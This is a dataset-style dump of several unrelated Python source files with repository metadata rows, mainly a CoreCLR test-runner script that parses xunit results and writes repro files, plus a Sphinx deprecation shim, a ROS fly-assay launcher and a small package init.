dir_contents = defaultdict(lambda: None)
for item in os.listdir(os.path.dirname(test_path)):
dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item
file_name_cache[os.path.dirname(test_path)] = dir_contents
# It is possible there has already been a match
# therefore we need to remove the punctuation again.
basename_to_match = re.sub("[%s]" % string.punctuation, "_", os.path.basename(test_path))
if basename_to_match in dir_contents:
test_path = os.path.join(os.path.dirname(test_path), dir_contents[basename_to_match])
size_of_largest_name_file = len(max(dir_contents, key=len))
return test_path, size_of_largest_name_file
def dir_has_nested_substrings(test_path, test_item):
""" A directory has multiple paths where one path is a substring of another
"""
dir_contents = file_name_cache[os.path.dirname(test_path)]
if dir_contents is None:
dir_contents = defaultdict(lambda: None)
for item in os.listdir(os.path.dirname(test_path)):
dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item
file_name_cache[os.path.dirname(test_path)] = dir_contents
test_item = re.sub("[%s]" % string.punctuation, "_", test_item)
count = 0
for item in dir_contents:
if test_item in item:
count += 1
return count > 1
# Find the test by searching down the directory list.
starting_path = test_location
loc_split = location.split("_")
append = False
for index, item in enumerate(loc_split):
if not append:
test_path = os.path.join(starting_path, item)
else:
append = False
test_path, size_of_largest_name_file = match_filename(starting_path + "_" + item)
if not is_file_or_dir(test_path):
append = True
# It is possible that there is another directory that is named
# without an underscore.
elif index + 1 < len(loc_split) and os.path.isdir(test_path):
next_test_path = os.path.join(test_path, loc_split[index + 1])
if not is_file_or_dir(next_test_path) or dir_has_nested_substrings(test_path, item):
added_path = test_path
for forward_index in range(index + 1, len(loc_split)):
added_path, size_of_largest_name_file = match_filename(added_path + "_" + loc_split[forward_index])
if is_file_or_dir(added_path):
append = True
break
elif size_of_largest_name_file < len(os.path.basename(added_path)):
break
starting_path = test_path
location = starting_path
if not os.path.isfile(location):
print("Warning: couldn't find test: %s" % test_name)
return None
assert(os.path.isfile(location))
return location
def parse_test_results(args):
""" Parse the test results for test execution information
Args:
args : arguments
"""
log_path = os.path.join(args.logs_dir, "TestRunResults_%s_%s_%s" % (args.host_os, args.arch, args.build_type))
print("Parsing test results from (%s)" % log_path)
test_run_location = os.path.join(args.logs_dir, "testRun.xml")
if not os.path.isfile(test_run_location):
# Check if this is a casing issue
found = False
for item in os.listdir(args.logs_dir):
item_lower = item.lower()
if item_lower == "testrun.xml":
# Correct the name.
os.rename(os.path.join(args.logs_dir, item), test_run_location)
found = True
break
if not found:
print("Unable to find testRun.xml. This normally means the tests did not run.")
print("It could also mean there was a problem logging. Please run the tests again.")
return
print("Analyzing {}".format(test_run_location))
assemblies = xml.etree.ElementTree.parse(test_run_location).getroot()
tests = defaultdict(lambda: None)
for assembly in assemblies:
for collection in assembly:
if collection.tag == "errors" and collection.text != None:
# Something went wrong during running the tests.
print("Error running the tests, please run run.py again.")
sys.exit(1)
elif collection.tag != "errors":
test_name = None
for test in collection:
type = test.attrib["type"]
method = test.attrib["method"]
type = type.split("._")[0]
test_name = type + method
assert test_name != None
failed = collection.attrib["failed"]
skipped = collection.attrib["skipped"]
passed = collection.attrib["passed"]
time = float(collection.attrib["time"])
test_output = None
if failed == "1":
failure_info = collection[0][0]
test_output = failure_info.text
test_location_on_filesystem = find_test_from_name(args.host_os, args.test_location, test_name)
if test_location_on_filesystem is not None:
assert os.path.isfile(test_location_on_filesystem)
assert tests[test_name] == None
tests[test_name] = defaultdict(lambda: None, {
"name": test_name,
"test_path": test_location_on_filesystem,
"failed": failed,
"skipped": skipped,
"passed": passed,
"time": time,
"test_output": test_output
})
return tests
def print_summary(tests):
""" Print a summary of the test results
Args:
tests (defaultdict[String]: { }): The tests that were reported by
: xunit
"""
assert tests is not None
failed_tests = []
passed_tests = []
skipped_tests = []
for test in tests:
test = tests[test]
if test["failed"] == "1":
failed_tests.append(test)
elif test["passed"] == "1":
passed_tests.append(test)
else:
skipped_tests.append(test)
failed_tests.sort(key=lambda item: item["time"], reverse=True)
passed_tests.sort(key=lambda item: item["time"], reverse=True)
skipped_tests.sort(key=lambda item: item["time"], reverse=True)
def print_tests_helper(tests, stop_count):
for index, item in enumerate(tests):
time = item["time"]
unit = "seconds"
time_remainder = ""
second_unit = ""
saved_time = time
remainder_str = ""
# If it can be expressed in hours
if time > 60**2:
time = saved_time / (60**2)
time_remainder = saved_time % (60**2)
time_remainder /= 60
time_remainder = math.floor(time_remainder)
unit = "hours"
second_unit = "minutes"
remainder_str = " %s %s" % (int(time_remainder), second_unit)
elif time > 60 and time < 60**2:
time = saved_time / 60
time_remainder = saved_time % 60
time_remainder = math.floor(time_remainder)
unit = "minutes"
second_unit = "seconds"
remainder_str = " %s %s" % (int(time_remainder), second_unit)
print("%s (%d %s%s)" % (item["test_path"], time, unit, remainder_str))
if stop_count != None:
if index >= stop_count:
break
if len(failed_tests) > 0:
print("%d failed tests:" % len(failed_tests))
print("")
print_tests_helper(failed_tests, None)
# The following code is currently disabled, as it produces too much verbosity in a normal
# test run. It could be put under a switch, or else just enabled as needed when investigating
# test slowness.
#
# if len(passed_tests) > 50:
# print("")
# print("50 slowest passing tests:")
# print("")
# print_tests_helper(passed_tests, 50)
if len(failed_tests) > 0:
print("")
print("#################################################################")
print("Output of failing tests:")
print("")
for item in failed_tests:
print("[%s]: " % item["test_path"])
print("")
test_output = item["test_output"]
# XUnit results are captured as escaped characters.
#test_output = test_output.replace("\\r", "\r")
#test_output = test_output.replace("\\n", "\n")
#test_output = test_output.replace("/r", "\r")
#test_output = test_output.replace("/n", "\n")
# Replace CR/LF by just LF; Python "print", below, will map as necessary on the platform.
# If we don't do this, then Python on Windows will convert \r\n to \r\r\n on output.
test_output = test_output.replace("\r\n", "\n")
unicode_output = None
if sys.version_info < (3,0):
# Handle unicode characters in output in python2.*
try:
unicode_output = unicode(test_output, "utf-8")
except:
print("Error: failed to convert Unicode output")
else:
unicode_output = test_output
if unicode_output is not None:
print(unicode_output)
print("")
print("")
print("#################################################################")
print("End of output of failing tests")
print("#################################################################")
print("")
print("")
print("Total tests run : %d" % len(tests))
print("Total passing tests: %d" % len(passed_tests))
print("Total failed tests : %d" % len(failed_tests))
print("Total skipped tests: %d" % len(skipped_tests))
print("")
def create_repro(args, env, tests):
""" Go through the failing tests and create repros for them
Args:
args
env
tests (defaultdict[String]: { }): The tests that were reported by
: xunit
"""
assert tests is not None
failed_tests = [tests[item] for item in tests if tests[item]["failed"] == "1"]
if len(failed_tests) == 0:
return
repro_location = os.path.join(args.artifacts_location, "repro", "%s.%s.%s" % (args.host_os, args.arch, args.build_type))
if os.path.isdir(repro_location):
shutil.rmtree(repro_location)
print("")
print("Creating repro files at: %s" % repro_location)
os.makedirs(repro_location)
assert os.path.isdir(repro_location)
# Now that the repro_location exists under <runtime>/artifacts/repro
# create wrappers which will simply run the test with the correct environment
for test in failed_tests:
debug_env = DebugEnv(args, env, test)
debug_env.write_repro()
print("Repro files written.")
################################################################################
# Main
################################################################################
def main(args):
global g_verbose
g_verbose = args.verbose
ret_code = 0
args = setup_args(args)
env = get_environment(test_env=args.test_env)
if not args.analyze_results_only:
if args.test_env is not None:
ret_code = run_tests(args, args.test_env)
else:
ret_code = create_and_use_test_env(args.host_os,
env,
lambda test_env_script_path: run_tests(args, test_env_script_path))
print("Test run finished.")
if not args.skip_test_run:
tests = parse_test_results(args)
if tests is not None:
print_summary(tests)
create_repro(args, env, tests)
return ret_code
################################################################################
# __main__
################################################################################
if __name__ == "__main__":
args = parser.parse_args()
sys.exit(main(args))
| 38.076034 | 230 | 0.603336 |
This requires all tests run on linux x64 to be built by the
# same platform and arch. If this is not done, the tests will run correctly;
# however, expect failures due to incorrect exclusions in the xunit
# wrappers setup at build time.
#
# Note that for linux targets the native components to the tests are still built
# by the product build. This requires all native components to be either copied
# into the Core_Root directory or the test's managed directory. The latter is
ontext")
is_same_os = False
is_same_arch = False
is_same_build_type = False
if os.path.isfile(os.path.join(coreclr_setup_args.test_location, "build_info.json")):
with open(os.path.join(coreclr_setup_args.test_location, "build_info.json")) as file_handle:
build_info = json.load(file_handle)
is_same_os = build_info["build_os"] == coreclr_setup_args.host_os
is_same_arch = build_info["build_arch"] == coreclr_setup_args.arch
is_same_build_type = build_info["build_type"] == coreclr_setup_args.build_type
if coreclr_setup_args.host_os != "windows" and not (is_same_os and is_same_arch and is_same_build_type):
test_native_bin_location = None
if args.test_native_bin_location is None:
test_native_bin_location = os.path.join(os.path.join(coreclr_setup_args.artifacts_location, "tests", "coreclr", "obj", "%s.%s.%s" % (coreclr_setup_args.host_os, coreclr_setup_args.arch, coreclr_setup_args.build_type)))
else:
test_native_bin_location = args.test_native_bin_location
coreclr_setup_args.verify(test_native_bin_location,
"test_native_bin_location",
lambda test_native_bin_location: os.path.isdir(test_native_bin_location),
"Error setting test_native_bin_location")
else:
setattr(coreclr_setup_args, "test_native_bin_location", None)
print("host_os : %s" % coreclr_setup_args.host_os)
print("arch : %s" % coreclr_setup_args.arch)
print("build_type : %s" % coreclr_setup_args.build_type)
print("runtime_repo_location : %s" % coreclr_setup_args.runtime_repo_location)
print("product_location : %s" % coreclr_setup_args.product_location)
print("core_root : %s" % coreclr_setup_args.core_root)
print("test_location : %s" % coreclr_setup_args.test_location)
print("test_native_bin_location : %s" % coreclr_setup_args.test_native_bin_location)
coreclr_setup_args.crossgen_path = os.path.join(coreclr_setup_args.core_root, "crossgen%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
coreclr_setup_args.corerun_path = os.path.join(coreclr_setup_args.core_root, "corerun%s" % (".exe" if coreclr_setup_args.host_os == "windows" else ""))
coreclr_setup_args.dotnetcli_script_path = os.path.join(coreclr_setup_args.runtime_repo_location, "dotnet%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
coreclr_setup_args.coreclr_tests_dir = os.path.join(coreclr_setup_args.coreclr_dir, "tests")
coreclr_setup_args.coreclr_tests_src_dir = os.path.join(coreclr_setup_args.runtime_repo_location, "src", "tests")
coreclr_setup_args.runincontext_script_path = os.path.join(coreclr_setup_args.coreclr_tests_src_dir, "Common", "scripts", "runincontext%s" % (".cmd" if coreclr_setup_args.host_os == "windows" else ".sh"))
coreclr_setup_args.logs_dir = os.path.join(coreclr_setup_args.artifacts_location, "log")
return coreclr_setup_args
def precompile_core_root(args):
skip_list = [
".*xunit.*",
".*api-ms-win-core.*",
".*api-ms-win.*",
".*System.Private.CoreLib.*"
]
unix_skip_list = [
".*mscorlib.*",
".*System.Runtime.WindowsRuntime.*",
".*System.Runtime.WindowsRuntime.UI.Xaml.*",
".*R2RDump.dll.*"
]
arm64_unix_skip_list = [
".*Microsoft.CodeAnalysis.VisualBasic.*",
".*System.Net.NameResolution.*",
".*System.Net.Sockets.*",
".*System.Net.Primitives.*"
]
if args.host_os != "windows":
skip_list += unix_skip_list
if args.arch == "arm64":
skip_list += arm64_unix_skip_list
assert os.path.isdir(args.test_location)
assert os.path.isdir(args.core_root)
def call_crossgen(file, env):
assert os.path.isfile(args.crossgen_path)
command = [args.crossgen_path, "/Platform_Assemblies_Paths", args.core_root, file]
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
proc.communicate()
return_code = proc.returncode
if return_code == -2146230517:
print("%s is not a managed assembly." % file)
return False
if return_code != 0:
print("Unable to precompile %s (%d)" % (file, return_code))
return False
print("Successfully precompiled %s" % file)
return True
print("Precompiling all assemblies in %s" % args.core_root)
print("")
env = os.environ.copy()
if not args.crossgen_altjit is None:
env["COMPlus_AltJit"]="*"
env["COMPlus_AltJitNgen"]="*"
env["COMPlus_AltJitName"]=args.crossgen_altjit
env["COMPlus_AltJitAssertOnNYI"]="1"
env["COMPlus_NoGuiOnAssert"]="1"
env["COMPlus_ContinueOnAssert"]="0"
dlls = [os.path.join(args.core_root, item) for item in os.listdir(args.core_root) if item.endswith("dll") and "mscorlib" not in item]
def in_skip_list(item):
found = False
for skip_re in skip_list:
if re.match(skip_re, item.lower()) is not None:
found = True
return found
dlls = [dll for dll in dlls if not in_skip_list(dll)]
for dll in dlls:
call_crossgen(dll, env)
print("")
if sys.version_info.major < 3:
def to_unicode(s):
return unicode(s, "utf-8")
else:
def to_unicode(s):
return s
def find_test_from_name(host_os, test_location, test_name):
location = test_name
is_file_or_dir = lambda path : os.path.isdir(path) or os.path.isfile(path)
def match_filename(test_path):
global file_name_cache
if not os.path.isdir(os.path.dirname(test_path)):
pass
assert os.path.isdir(os.path.dirname(test_path))
size_of_largest_name_file = 0
dir_contents = file_name_cache[os.path.dirname(test_path)]
if dir_contents is None:
dir_contents = defaultdict(lambda: None)
for item in os.listdir(os.path.dirname(test_path)):
dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item
file_name_cache[os.path.dirname(test_path)] = dir_contents
basename_to_match = re.sub("[%s]" % string.punctuation, "_", os.path.basename(test_path))
if basename_to_match in dir_contents:
test_path = os.path.join(os.path.dirname(test_path), dir_contents[basename_to_match])
size_of_largest_name_file = len(max(dir_contents, key=len))
return test_path, size_of_largest_name_file
def dir_has_nested_substrings(test_path, test_item):
dir_contents = file_name_cache[os.path.dirname(test_path)]
if dir_contents is None:
dir_contents = defaultdict(lambda: None)
for item in os.listdir(os.path.dirname(test_path)):
dir_contents[re.sub("[%s]" % string.punctuation, "_", item)] = item
file_name_cache[os.path.dirname(test_path)] = dir_contents
test_item = re.sub("[%s]" % string.punctuation, "_", test_item)
count = 0
for item in dir_contents:
if test_item in item:
count += 1
return count > 1
starting_path = test_location
loc_split = location.split("_")
append = False
for index, item in enumerate(loc_split):
if not append:
test_path = os.path.join(starting_path, item)
else:
append = False
test_path, size_of_largest_name_file = match_filename(starting_path + "_" + item)
if not is_file_or_dir(test_path):
append = True
elif index + 1 < len(loc_split) and os.path.isdir(test_path):
next_test_path = os.path.join(test_path, loc_split[index + 1])
if not is_file_or_dir(next_test_path) or dir_has_nested_substrings(test_path, item):
added_path = test_path
for forward_index in range(index + 1, len(loc_split)):
added_path, size_of_largest_name_file = match_filename(added_path + "_" + loc_split[forward_index])
if is_file_or_dir(added_path):
append = True
break
elif size_of_largest_name_file < len(os.path.basename(added_path)):
break
starting_path = test_path
location = starting_path
if not os.path.isfile(location):
print("Warning: couldn't find test: %s" % test_name)
return None
assert(os.path.isfile(location))
return location
def parse_test_results(args):
log_path = os.path.join(args.logs_dir, "TestRunResults_%s_%s_%s" % (args.host_os, args.arch, args.build_type))
print("Parsing test results from (%s)" % log_path)
test_run_location = os.path.join(args.logs_dir, "testRun.xml")
if not os.path.isfile(test_run_location):
# Check if this is a casing issue
found = False
for item in os.listdir(args.logs_dir):
item_lower = item.lower()
if item_lower == "testrun.xml":
# Correct the name.
os.rename(os.path.join(args.logs_dir, item), test_run_location)
found = True
break
if not found:
print("Unable to find testRun.xml. This normally means the tests did not run.")
print("It could also mean there was a problem logging. Please run the tests again.")
return
print("Analyzing {}".format(test_run_location))
assemblies = xml.etree.ElementTree.parse(test_run_location).getroot()
tests = defaultdict(lambda: None)
for assembly in assemblies:
for collection in assembly:
if collection.tag == "errors" and collection.text != None:
# Something went wrong during running the tests.
print("Error running the tests, please run run.py again.")
sys.exit(1)
elif collection.tag != "errors":
test_name = None
for test in collection:
type = test.attrib["type"]
method = test.attrib["method"]
type = type.split("._")[0]
test_name = type + method
assert test_name != None
failed = collection.attrib["failed"]
skipped = collection.attrib["skipped"]
passed = collection.attrib["passed"]
time = float(collection.attrib["time"])
test_output = None
if failed == "1":
failure_info = collection[0][0]
test_output = failure_info.text
test_location_on_filesystem = find_test_from_name(args.host_os, args.test_location, test_name)
if test_location_on_filesystem is not None:
assert os.path.isfile(test_location_on_filesystem)
assert tests[test_name] == None
tests[test_name] = defaultdict(lambda: None, {
"name": test_name,
"test_path": test_location_on_filesystem,
"failed": failed,
"skipped": skipped,
"passed": passed,
"time": time,
"test_output": test_output
})
return tests
def print_summary(tests):
assert tests is not None
failed_tests = []
passed_tests = []
skipped_tests = []
for test in tests:
test = tests[test]
if test["failed"] == "1":
failed_tests.append(test)
elif test["passed"] == "1":
passed_tests.append(test)
else:
skipped_tests.append(test)
failed_tests.sort(key=lambda item: item["time"], reverse=True)
passed_tests.sort(key=lambda item: item["time"], reverse=True)
skipped_tests.sort(key=lambda item: item["time"], reverse=True)
def print_tests_helper(tests, stop_count):
for index, item in enumerate(tests):
time = item["time"]
unit = "seconds"
time_remainder = ""
second_unit = ""
saved_time = time
remainder_str = ""
# If it can be expressed in hours
if time > 60**2:
time = saved_time / (60**2)
time_remainder = saved_time % (60**2)
time_remainder /= 60
time_remainder = math.floor(time_remainder)
unit = "hours"
second_unit = "minutes"
remainder_str = " %s %s" % (int(time_remainder), second_unit)
elif time > 60 and time < 60**2:
time = saved_time / 60
time_remainder = saved_time % 60
time_remainder = math.floor(time_remainder)
unit = "minutes"
second_unit = "seconds"
remainder_str = " %s %s" % (int(time_remainder), second_unit)
print("%s (%d %s%s)" % (item["test_path"], time, unit, remainder_str))
if stop_count != None:
if index >= stop_count:
break
if len(failed_tests) > 0:
print("%d failed tests:" % len(failed_tests))
print("")
print_tests_helper(failed_tests, None)
# The following code is currently disabled, as it produces too much verbosity in a normal
# test run. It could be put under a switch, or else just enabled as needed when investigating
# test slowness.
#
# if len(passed_tests) > 50:
# print("")
# print("50 slowest passing tests:")
# print("")
# print_tests_helper(passed_tests, 50)
if len(failed_tests) > 0:
print("")
print("#################################################################")
print("Output of failing tests:")
print("")
for item in failed_tests:
print("[%s]: " % item["test_path"])
print("")
test_output = item["test_output"]
# XUnit results are captured as escaped characters.
#test_output = test_output.replace("\\r", "\r")
#test_output = test_output.replace("\\n", "\n")
#test_output = test_output.replace("/r", "\r")
#test_output = test_output.replace("/n", "\n")
# Replace CR/LF by just LF; Python "print", below, will map as necessary on the platform.
# If we don't do this, then Python on Windows will convert \r\n to \r\r\n on output.
test_output = test_output.replace("\r\n", "\n")
unicode_output = None
if sys.version_info < (3,0):
try:
unicode_output = unicode(test_output, "utf-8")
except:
print("Error: failed to convert Unicode output")
else:
unicode_output = test_output
if unicode_output is not None:
print(unicode_output)
print("")
print("")
print("#################################################################")
print("End of output of failing tests")
print("#################################################################")
print("")
print("")
print("Total tests run : %d" % len(tests))
print("Total passing tests: %d" % len(passed_tests))
print("Total failed tests : %d" % len(failed_tests))
print("Total skipped tests: %d" % len(skipped_tests))
print("")
def create_repro(args, env, tests):
assert tests is not None
failed_tests = [tests[item] for item in tests if tests[item]["failed"] == "1"]
if len(failed_tests) == 0:
return
repro_location = os.path.join(args.artifacts_location, "repro", "%s.%s.%s" % (args.host_os, args.arch, args.build_type))
if os.path.isdir(repro_location):
shutil.rmtree(repro_location)
print("")
print("Creating repro files at: %s" % repro_location)
os.makedirs(repro_location)
assert os.path.isdir(repro_location)
for test in failed_tests:
debug_env = DebugEnv(args, env, test)
debug_env.write_repro()
print("Repro files written.")
| true | true |
f71034708fa8005df0436c0f212fae7a6821a4c0 | 1,015 | py | Python | sphinx/websupport/__init__.py | hason/sphinx | 5cd0f235a891de80b637c20e0d90fd916cc68a86 | [
"BSD-2-Clause"
] | null | null | null | sphinx/websupport/__init__.py | hason/sphinx | 5cd0f235a891de80b637c20e0d90fd916cc68a86 | [
"BSD-2-Clause"
] | null | null | null | sphinx/websupport/__init__.py | hason/sphinx | 5cd0f235a891de80b637c20e0d90fd916cc68a86 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
sphinx.websupport
~~~~~~~~~~~~~~~~~
Base Module for web support functions.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import warnings
from sphinx.deprecation import RemovedInSphinx20Warning
try:
from sphinxcontrib.websupport import WebSupport # NOQA
from sphinxcontrib.websupport import errors # NOQA
from sphinxcontrib.websupport.search import BaseSearch, SEARCH_ADAPTERS # NOQA
from sphinxcontrib.websupport.storage import StorageBackend # NOQA
warnings.warn('sphinx.websupport module is now provided as sphinxcontrib-webuspport. '
'sphinx.websupport will be removed in Sphinx-2.0. Please use it instaed',
RemovedInSphinx20Warning)
except ImportError:
warnings.warn('Since Sphinx-1.6, sphinx.websupport module is now separated to '
'sphinxcontrib-webuspport package. Please add it into your dependency list.')
| 36.25 | 95 | 0.708374 |
import warnings
from sphinx.deprecation import RemovedInSphinx20Warning
try:
from sphinxcontrib.websupport import WebSupport
from sphinxcontrib.websupport import errors
from sphinxcontrib.websupport.search import BaseSearch, SEARCH_ADAPTERS
from sphinxcontrib.websupport.storage import StorageBackend
warnings.warn('sphinx.websupport module is now provided as sphinxcontrib-webuspport. '
'sphinx.websupport will be removed in Sphinx-2.0. Please use it instaed',
RemovedInSphinx20Warning)
except ImportError:
warnings.warn('Since Sphinx-1.6, sphinx.websupport module is now separated to '
'sphinxcontrib-webuspport package. Please add it into your dependency list.')
| true | true |
f71034b281252754f23f61cc8d343b1177404fdc | 5,670 | py | Python | faa_computer_admin/src/faa_computer_admin/control.py | njmei/fly-alcohol-assay | a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc | [
"BSD-3-Clause"
] | null | null | null | faa_computer_admin/src/faa_computer_admin/control.py | njmei/fly-alcohol-assay | a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc | [
"BSD-3-Clause"
] | null | null | null | faa_computer_admin/src/faa_computer_admin/control.py | njmei/fly-alcohol-assay | a3efc40e5ed5d48ed3a80e4b162e13736b0e04cc | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from __future__ import print_function
import roslib
roslib.load_manifest('faa_computer_admin')
import rospy
import argparse
import subprocess
from faa_utilities import FindData
from faa_data_processing import TrackingDataProcessor
from faa_data_processing import VideoDataProcessor
from faa_data_processing import FigureDataProcessor
def process(path_list,overwrite,tracking,video,figure):
"""
Process data
"""
fd = FindData(overwrite)
path = path_list[0]
if not tracking and not video and not figure:
tracking = True
video = True
figure = True
if figure and not tracking:
tracking = True
if tracking:
contains_data = fd.path_contains_tracking_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain tracking data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain tracking data, or tracking data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
tdp = TrackingDataProcessor(overwrite)
tdp.find_and_process_data(path)
if video:
contains_data = fd.path_contains_video_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain video data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain video data, or video data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
vdp = VideoDataProcessor(overwrite)
vdp.find_and_process_data(path)
if figure:
contains_data = fd.path_contains_figure_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain figure data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain figure data, or figure data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
fdp = FigureDataProcessor(overwrite)
fdp.find_and_process_data(path)
def calibrate():
"""
Starts the camera calibration application
"""
_roslaunch('calibrate_camera.launch')
def experiment(no_usb_hardware):
"""
Starts the experiment mode application
"""
if no_usb_hardware:
print("Running in test mode with no USB hardware attached.")
options = {'hardware': "false"}
else:
print("USB hardware attached!")
options = {'hardware': "true"}
reuse_background_images = False
if reuse_background_images:
print("Reusing background images.")
options['reusing_bg_images'] = "true"
else:
options['reusing_bg_images'] = "false"
_roslaunch('experiment.launch',options)
def manual(no_usb_hardware):
"""
Starts the manual mode application
"""
if no_usb_hardware:
print("Running in test mode with no USB hardware attached.")
options = {'hardware': "false"}
else:
print("USB hardware attached!")
options = {'hardware': "true"}
_roslaunch('manual_control.launch',options)
def save_images():
"""
Starts the save images application
"""
options = {}
_roslaunch('save_images.launch',options)
def _roslaunch(launch_file,options={}):
"""
Runs a roslaunch file.
"""
try:
call_list = ['roslaunch', 'faa_launch', launch_file]
for option in options:
call_list.append(option + ":=" + str(options[option]))
subprocess.call(call_list)
except KeyboardInterrupt:
return
def cli():
parser = argparse.ArgumentParser(description='Fly Alcohol Assay Control')
# parser.add_argument('-t','--test',action="store_true",
# help='launch test.launch')
parser.add_argument('-c','--calibrate',action="store_true",
help='launch calibrate_camera.launch')
parser.add_argument('-e','--experiment',action="store_true", default=True,
help='launch experiment.launch')
parser.add_argument('-n','--no-usb-hardware',action="store_true",
help='set testing mode when USB hardware is not attached')
parser.add_argument('-p','--process',dest='process_path',nargs=1,default=False,
help='process data within directory')
parser.add_argument('-o','--overwrite',action="store_true", default=False,
help='reprocess data and overwrite processed data files')
parser.add_argument('-t','--tracking',action="store_true", default=False,
help='process tracking data')
parser.add_argument('-v','--video',action="store_true", default=False,
help='process videos')
parser.add_argument('-f','--figure',action="store_true", default=False,
help='process data figure')
# parser.add_argument('-r','--reuse-background-images',action="store_true",
# help='reuse background images when testing')
parser.add_argument('-m','--manual',action="store_true",
help='launch manual control GUI')
args = parser.parse_args()
if args.process_path:
process(args.process_path,args.overwrite,args.tracking,args.video,args.figure)
elif args.calibrate:
calibrate()
# elif args.save_images:
# save_images()
elif args.manual:
manual(args.no_usb_hardware)
elif args.experiment:
experiment(args.no_usb_hardware)
| 37.8 | 118 | 0.65097 |
from __future__ import print_function
import roslib
roslib.load_manifest('faa_computer_admin')
import rospy
import argparse
import subprocess
from faa_utilities import FindData
from faa_data_processing import TrackingDataProcessor
from faa_data_processing import VideoDataProcessor
from faa_data_processing import FigureDataProcessor
def process(path_list,overwrite,tracking,video,figure):
fd = FindData(overwrite)
path = path_list[0]
if not tracking and not video and not figure:
tracking = True
video = True
figure = True
if figure and not tracking:
tracking = True
if tracking:
contains_data = fd.path_contains_tracking_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain tracking data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain tracking data, or tracking data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
tdp = TrackingDataProcessor(overwrite)
tdp.find_and_process_data(path)
if video:
contains_data = fd.path_contains_video_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain video data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain video data, or video data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
vdp = VideoDataProcessor(overwrite)
vdp.find_and_process_data(path)
if figure:
contains_data = fd.path_contains_figure_data(path)
if not contains_data and overwrite:
print("Path does not exist or does not contain figure data.")
elif not contains_data and not overwrite:
print("Path does not exist, does not contain figure data, or figure data has already been processed.")
print("Try -o overwrite switch to reprocess data.")
fdp = FigureDataProcessor(overwrite)
fdp.find_and_process_data(path)
def calibrate():
_roslaunch('calibrate_camera.launch')
def experiment(no_usb_hardware):
if no_usb_hardware:
print("Running in test mode with no USB hardware attached.")
options = {'hardware': "false"}
else:
print("USB hardware attached!")
options = {'hardware': "true"}
reuse_background_images = False
if reuse_background_images:
print("Reusing background images.")
options['reusing_bg_images'] = "true"
else:
options['reusing_bg_images'] = "false"
_roslaunch('experiment.launch',options)
def manual(no_usb_hardware):
if no_usb_hardware:
print("Running in test mode with no USB hardware attached.")
options = {'hardware': "false"}
else:
print("USB hardware attached!")
options = {'hardware': "true"}
_roslaunch('manual_control.launch',options)
def save_images():
options = {}
_roslaunch('save_images.launch',options)
def _roslaunch(launch_file,options={}):
try:
call_list = ['roslaunch', 'faa_launch', launch_file]
for option in options:
call_list.append(option + ":=" + str(options[option]))
subprocess.call(call_list)
except KeyboardInterrupt:
return
def cli():
parser = argparse.ArgumentParser(description='Fly Alcohol Assay Control')
parser.add_argument('-c','--calibrate',action="store_true",
help='launch calibrate_camera.launch')
parser.add_argument('-e','--experiment',action="store_true", default=True,
help='launch experiment.launch')
parser.add_argument('-n','--no-usb-hardware',action="store_true",
help='set testing mode when USB hardware is not attached')
parser.add_argument('-p','--process',dest='process_path',nargs=1,default=False,
help='process data within directory')
parser.add_argument('-o','--overwrite',action="store_true", default=False,
help='reprocess data and overwrite processed data files')
parser.add_argument('-t','--tracking',action="store_true", default=False,
help='process tracking data')
parser.add_argument('-v','--video',action="store_true", default=False,
help='process videos')
parser.add_argument('-f','--figure',action="store_true", default=False,
help='process data figure')
parser.add_argument('-m','--manual',action="store_true",
help='launch manual control GUI')
args = parser.parse_args()
if args.process_path:
process(args.process_path,args.overwrite,args.tracking,args.video,args.figure)
elif args.calibrate:
calibrate()
elif args.manual:
manual(args.no_usb_hardware)
elif args.experiment:
experiment(args.no_usb_hardware)
| true | true |
f7103744258570afc23a22f07e345f4e747dd4cc | 245 | py | Python | DDGraphs/__init__.py | lancelotimb/dd-graphs | ff6f6f2efcdf9e3784c465c8977b41543654b4f0 | [
"MIT"
] | null | null | null | DDGraphs/__init__.py | lancelotimb/dd-graphs | ff6f6f2efcdf9e3784c465c8977b41543654b4f0 | [
"MIT"
] | null | null | null | DDGraphs/__init__.py | lancelotimb/dd-graphs | ff6f6f2efcdf9e3784c465c8977b41543654b4f0 | [
"MIT"
] | null | null | null | from .init import init
from .draw_timeseries_graph import draw_timeseries_graph
from .draw_pie_charts import draw_pie_chart
from .draw_top_list import draw_top_list
__all__ = ["init", "draw_timeseries_graph", "draw_pie_chart", "draw_top_list"]
| 35 | 78 | 0.832653 | from .init import init
from .draw_timeseries_graph import draw_timeseries_graph
from .draw_pie_charts import draw_pie_chart
from .draw_top_list import draw_top_list
__all__ = ["init", "draw_timeseries_graph", "draw_pie_chart", "draw_top_list"]
| true | true |
f710381da3f755d00f1686fe84e2e0bb0f62b4dc | 1,215 | py | Python | pyIsoDep/tests/read_csv.py | MattKrecicki/PYTHON-ISOTOPIC-DEPLETION-PACKAGE | ccad214de8721aa9b499ef70cd39966f18bceb76 | [
"MIT"
